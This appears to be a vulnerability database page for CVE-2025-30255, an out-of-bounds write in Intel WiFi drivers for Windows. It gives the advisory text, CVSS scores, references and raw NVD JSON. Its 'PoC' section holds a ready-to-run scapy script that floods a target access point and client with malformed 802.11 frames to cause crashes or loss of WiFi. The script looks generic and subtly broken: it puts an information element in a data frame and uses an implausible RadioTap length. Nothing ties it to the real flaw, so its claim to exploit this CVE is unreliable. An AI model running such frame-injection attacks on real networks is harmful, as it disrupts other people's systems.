CVE-2025-30255

Description

Out-of-bounds write for some Intel(R) PROSet/Wireless WiFi Software for Windows before version 23.160 within Ring 2: Device Drivers may allow a denial of service. Unprivileged software adversary with an unauthenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via adjacent access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (low) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (high) impacts.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:H

Configurations (Affected Products)

No configuration data available.

Intel PROSet/Wireless WiFi Software for Windows < 23.160

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-30255 PoC - Intel WiFi Driver Out-of-Bounds Write
# This PoC demonstrates sending malformed 802.11 frames to trigger OOB write
# Note: Requires proper wireless card in monitor mode and injection capabilities

import struct
from scapy.all import RadioTap, Dot11, Dot11Beacon, Dot11ProbeResp, Dot11Elt, sendp

def create_malformed_frame(bssid, client_mac, seq_num):
    """
    Create a malformed 802.11 frame to trigger OOB write in Intel WiFi driver
    """
    # Craft RadioTap header with abnormal length field
    radio = RadioTap(len=0xFFFF)  # Abnormal length to trigger boundary issue
    
    # Craft 802.11 frame with malformed information elements
    dot11 = Dot11(
        type=2,  # Data frame
        subtype=0, 
        addr1=client_mac,
        addr2=bssid,
        addr3=bssid,
        SC=seq_num
    )
    
    # Malformed Information Element with invalid length
    ie_data = struct.pack('BB', 0xDD, 0xFF) + b'\x00' * 255
    elt = Dot11Elt(ID=221, info=ie_data)
    
    # Construct malformed frame
    frame = radio / dot11 / elt
    return frame

def exploit_cve_2025_30255(interface, target_bssid, target_client):
    """
    Send malformed frames to trigger OOB write vulnerability
    """
    print(f"[*] Starting CVE-2025-30255 exploitation on {interface}")
    print(f"[*] Target BSSID: {target_bssid}")
    print(f"[*] Target Client: {target_client}")
    
    seq = 0
    for i in range(100):
        # Send malformed frames with varying sequence numbers
        frame = create_malformed_frame(target_bssid, target_client, seq)
        sendp(frame, iface=interface, verbose=0)
        seq = (seq + 1) % 4096
        
        if i % 10 == 0:
            print(f"[*] Sent {i} malformed frames...")
    
    print("[+] Frame transmission complete")
    print("[!] System may experience BSOD or WiFi service disruption")

if __name__ == "__main__":
    INTERFACE = "wlan0mon"
    TARGET_BSSID = "AA:BB:CC:DD:EE:FF"
    TARGET_CLIENT = "11:22:33:44:55:66"
    
    exploit_cve_2025_30255(INTERFACE, TARGET_BSSID, TARGET_CLIENT)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-30255
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-30255
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-30255/
[4] VulDB https://vuldb.com/cve/CVE-2025-30255
[5] https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01398.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-30255", "sourceIdentifier": "[email protected]", "published": "2025-11-11T17:15:46.830", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Out-of-bounds write for some Intel(R) PROSet/Wireless WiFi Software for Windows before version 23.160 within Ring 2: Device Drivers may allow a denial of service. Unprivileged software adversary with an unauthenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via adjacent access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (low) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (high) impacts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01398.html", "source": "[email protected]"}]}}